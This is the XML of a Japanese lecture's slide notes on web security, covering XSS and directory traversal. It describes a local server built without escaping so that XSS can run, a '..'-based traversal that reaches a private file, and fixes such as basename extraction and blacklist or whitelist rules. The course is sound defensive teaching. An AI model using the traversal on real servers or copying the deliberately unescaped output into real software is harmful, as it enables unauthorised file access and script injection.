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56" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="402" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="265" r:id="rId12"/>
    <p:sldId id="266" r:id="rId13"/>
    <p:sldId id="267" r:id="rId14"/>
    <p:sldId id="268" r:id="rId15"/>
    <p:sldId id="269" r:id="rId16"/>
    <p:sldId id="270" r:id="rId17"/>
    <p:sldId id="284" r:id="rId18"/>
    <p:sldId id="285" r:id="rId19"/>
    <p:sldId id="286" r:id="rId20"/>
    <p:sldId id="287" r:id="rId21"/>
    <p:sldId id="271" r:id="rId22"/>
    <p:sldId id="272" r:id="rId23"/>
    <p:sldId id="273" r:id="rId24"/>
    <p:sldId id="275" r:id="rId25"/>
    <p:sldId id="276" r:id="rId26"/>
    <p:sldId id="277" r:id="rId27"/>
    <p:sldId id="278" r:id="rId28"/>
    <p:sldId id="279" r:id="rId29"/>
    <p:sldId id="280" r:id="rId30"/>
    <p:sldId id="281" r:id="rId31"/>
    <p:sldId id="282" r:id="rId32"/>
    <p:sldId id="283" r:id="rId33"/>
    <p:sldId id="274" r:id="rId34"/>
    <p:sldId id="289" r:id="rId35"/>
    <p:sldId id="288" r:id="rId36"/>
    <p:sldId id="290" r:id="rId37"/>
    <p:sldId id="291" r:id="rId38"/>
    <p:sldId id="292" r:id="rId39"/>
    <p:sldId id="293" r:id="rId40"/>
    <p:sldId id="294" r:id="rId41"/>
    <p:sldId id="295" r:id="rId42"/>
    <p:sldId id="296" r:id="rId43"/>
    <p:sldId id="297" r:id="rId44"/>
    <p:sldId id="298" r:id="rId45"/>
    <p:sldId id="300" r:id="rId46"/>
    <p:sldId id="301" r:id="rId47"/>
    <p:sldId id="302" r:id="rId48"/>
    <p:sldId id="303" r:id="rId49"/>
    <p:sldId id="305" r:id="rId50"/>
    <p:sldId id="299" r:id="rId51"/>
    <p:sldId id="317" r:id="rId52"/>
    <p:sldId id="314" r:id="rId53"/>
    <p:sldId id="313" r:id="rId54"/>
    <p:sldId id="315" r:id="rId55"/>
    <p:sldId id="304" r:id="rId56"/>
    <p:sldId id="320" r:id="rId57"/>
    <p:sldId id="309" r:id="rId58"/>
    <p:sldId id="310" r:id="rId59"/>
    <p:sldId id="311" r:id="rId60"/>
    <p:sldId id="306" r:id="rId61"/>
    <p:sldId id="307" r:id="rId62"/>
    <p:sldId id="308" r:id="rId63"/>
    <p:sldId id="316" r:id="rId64"/>
    <p:sldId id="318" r:id="rId65"/>
    <p:sldId id="319" r:id="rId66"/>
    <p:sldId id="321" r:id="rId67"/>
    <p:sldId id="322" r:id="rId68"/>
    <p:sldId id="335" r:id="rId69"/>
    <p:sldId id="332" r:id="rId70"/>
    <p:sldId id="329" r:id="rId71"/>
    <p:sldId id="330" r:id="rId72"/>
    <p:sldId id="331" r:id="rId73"/>
    <p:sldId id="333" r:id="rId74"/>
    <p:sldId id="334" r:id="rId75"/>
    <p:sldId id="323" r:id="rId76"/>
    <p:sldId id="324" r:id="rId77"/>
    <p:sldId id="325" r:id="rId78"/>
    <p:sldId id="328" r:id="rId79"/>
    <p:sldId id="326" r:id="rId80"/>
    <p:sldId id="327" r:id="rId81"/>
    <p:sldId id="336" r:id="rId82"/>
    <p:sldId id="342" r:id="rId83"/>
    <p:sldId id="341" r:id="rId84"/>
    <p:sldId id="401" r:id="rId85"/>
    <p:sldId id="337" r:id="rId86"/>
    <p:sldId id="338" r:id="rId87"/>
    <p:sldId id="339" r:id="rId88"/>
    <p:sldId id="340" r:id="rId89"/>
    <p:sldId id="343" r:id="rId90"/>
    <p:sldId id="344" r:id="rId91"/>
    <p:sldId id="345" r:id="rId92"/>
    <p:sldId id="346" r:id="rId93"/>
    <p:sldId id="348" r:id="rId94"/>
    <p:sldId id="352" r:id="rId95"/>
    <p:sldId id="382" r:id="rId96"/>
    <p:sldId id="357" r:id="rId97"/>
    <p:sldId id="356" r:id="rId98"/>
    <p:sldId id="347" r:id="rId99"/>
    <p:sldId id="349" r:id="rId100"/>
    <p:sldId id="350" r:id="rId101"/>
    <p:sldId id="351" r:id="rId102"/>
    <p:sldId id="353" r:id="rId103"/>
    <p:sldId id="354" r:id="rId104"/>
    <p:sldId id="355" r:id="rId105"/>
    <p:sldId id="375" r:id="rId106"/>
    <p:sldId id="376" r:id="rId107"/>
    <p:sldId id="377" r:id="rId108"/>
    <p:sldId id="378" r:id="rId109"/>
    <p:sldId id="367" r:id="rId110"/>
    <p:sldId id="370" r:id="rId111"/>
    <p:sldId id="371" r:id="rId112"/>
    <p:sldId id="368" r:id="rId113"/>
    <p:sldId id="369" r:id="rId114"/>
    <p:sldId id="374" r:id="rId115"/>
    <p:sldId id="379" r:id="rId116"/>
    <p:sldId id="358" r:id="rId117"/>
    <p:sldId id="359" r:id="rId118"/>
    <p:sldId id="360" r:id="rId119"/>
    <p:sldId id="361" r:id="rId120"/>
    <p:sldId id="362" r:id="rId121"/>
    <p:sldId id="363" r:id="rId122"/>
    <p:sldId id="364" r:id="rId123"/>
    <p:sldId id="365" r:id="rId124"/>
    <p:sldId id="366" r:id="rId125"/>
    <p:sldId id="372" r:id="rId126"/>
    <p:sldId id="373" r:id="rId127"/>
    <p:sldId id="380" r:id="rId128"/>
    <p:sldId id="381" r:id="rId129"/>
    <p:sldId id="383" r:id="rId130"/>
    <p:sldId id="384" r:id="rId131"/>
    <p:sldId id="389" r:id="rId132"/>
    <p:sldId id="398" r:id="rId133"/>
    <p:sldId id="399" r:id="rId134"/>
    <p:sldId id="390" r:id="rId135"/>
    <p:sldId id="391" r:id="rId136"/>
    <p:sldId id="385" r:id="rId137"/>
    <p:sldId id="387" r:id="rId138"/>
    <p:sldId id="386" r:id="rId139"/>
    <p:sldId id="392" r:id="rId140"/>
    <p:sldId id="393" r:id="rId141"/>
    <p:sldId id="400" r:id="rId142"/>
    <p:sldId id="394" r:id="rId143"/>
    <p:sldId id="395" r:id="rId144"/>
    <p:sldId id="396" r:id="rId145"/>
    <p:sldId id="397" r:id="rId1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31" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="48" d="100"/>
          <a:sy n="48" d="100"/>
        </p:scale>
        <p:origin x="1341"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520122-79C9-4901-9427-CB744546328C}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>2022/7/25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F7746-C7A6-4E0B-AF12-DE70F15F6DDC}" type="slidenum">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201538473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それでは、第</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>回、脆弱性対策をやっていきます。この講座では、不正アクセスの手口を学び、その対処方法について実際に理論とともにプログラムで実装する内容になっております。第</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
              <a:t>回までの内容でサービスに必要な技術を使えるようにはなりますが、それでどれだけ素晴らしいサービスを作れても不正アクセスを許してしまってはサービスへの信頼を失くしてしまいます。そこで今回は不正アクセスのやり方を学びテストの仕方を覚え、対策の仕方を学びます。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"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a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2447614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では、まず</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>です。これは、利用者が入力した内容を表示するタイプの</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サイトに存在する欠陥を悪用して、攻撃者が用意した、悪意のあるスクリプトを、利用者の元に送り込んで、実行させる攻撃手法です。一般的には</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>という略称で呼ばれています。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10</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24931006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HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ではファイル名を指定するテキストボックスと、ダウンロードを実行するボタンを配置します。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100</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15516477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ではまず通常のアクセスをします。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Public</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のフォルダには</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>public.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を保存しているため、テキストボックスには</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>public.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>と入れます。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101</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22835213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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>public.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の中身が表示されます。基本的にテキストファイルの場合はブラウザ上に表示されます。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102</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18029463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では次に、テキストボックスに、ピリオドを二つ打ち、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>と同じ位置にある別のフォルダとして</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を指定してファイル名を</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>private.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>とします。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103</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19294809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すると今度は秘密ファイルにアクセスされてしまいます。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104</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354663882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被害が分かったところで対策方法です。ディレクトリトラバーサルは根本的な対処方法と補償的な解決方法があります。根本的解決では攻撃の被害が起きないようになりますが、補償的解決では、それ単体で被害を確実に防げるわけではないため、サービスの利便性から使い分ける必要があります。それでは、根本的な解決方法として、入力されたテキストからファイル名のみを取り出して、定義されているフォルダのパスにファイル名を連結させ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105</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41580124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やり方としては、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>というライブラリでベースネームという機能を使用してテキストからファイル名のみを取り出します。その後、あらかじめ定義しているパスに取り出したファイル名の文字列を連結させます。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106</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12213620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では、先ほどのようにアクセスしてみます。まず正常なアクセスでは当然ですが表示できます。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107</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26954695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しかし、先ほどやりました不正アクセスでは、ファイル名のみが取り出されるため、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のフォルダに</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>private.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>というファイル名が無く、サーバ上のエラーがブラウザに表示されます。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108</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5899724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次に保険的な対策の一つ目です。基本的にこのような攻撃手法はフォルダを移動するために使われる文字列が原因になります。そのため、ピリオド二つやスラッシュ、また</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で使用される円マークが含まれている場合に不正アクセスとみなす手法が有ります。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109</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134473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ではこの</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の仕組みですが、代表的な手法としては、入力フォームに入力した内容や、データベースに</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のコードを入れます。これを行うことで、レスポンスに返す</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>に、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のコードを埋め込むことができます。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11</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34531495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これを実装する場合には、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で受け取ったテキストに先ほど挙げたフォルダ移動に使用される文字列が存在するかを判定します。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110</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4343528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特に何もなければ正常に動作します。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111</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5278239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しかしこのようにテキストにスラッシュを入れたり</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112</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22828866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ピリオドを二つ入れたり</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113</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29181703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円マークを入れた場合には、はじかれるようになります。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114</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28809556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一見するとこのような手法は有効であると思われるかもしれませんが、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>に反映される時に文字列が変換されるため、文字列の検出だと開発者が知らないだけで他の手法でもアクセスできる文字列があるかもしれないため、このやり方はあまり有効とは言えません。</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115</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2305003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の保険的対策としてはアクセスできないフォルダやファイルを選定するブラックリスト方式や、アクセスできるフォルダやファイルをあらかじめ定義してそれ以外アクセスできないようにするホワイトリスト方式の手法が有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116</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29601657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例えばブラックリスト方式では、このように</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のフォルダにはアクセスできないように設定します。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117</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38105840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これで正常なアクセスはできますし</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118</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28083125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Private</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のフォルダにはアクセスできないようにはできますが、</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119</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="531700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仕組みを知るために、実際にサーバ側のプログラムを作り、実行します。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>にアクセスした時に、テキストの入力フォームと、送信用のボタンを作ります。そして</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のテストに</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でアクセスされたときに、パラメータ「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」の内容を表示します。ここでは</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を実行するために、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>html.escape</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を使わないで表示します。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12</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40208947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一方で、指定していないフォルダにはアクセスすることができますのでこの手法はセキュリティレベルが非常に低いです。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120</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59369168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次にホワイトリスト方式です。ここではフォルダ名が</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>以外にアクセスできないようにします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121</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9757512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この手法だと</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>にはアクセスできますし</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122</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33272101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Private</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>についてはアクセスを遮断でき</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123</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
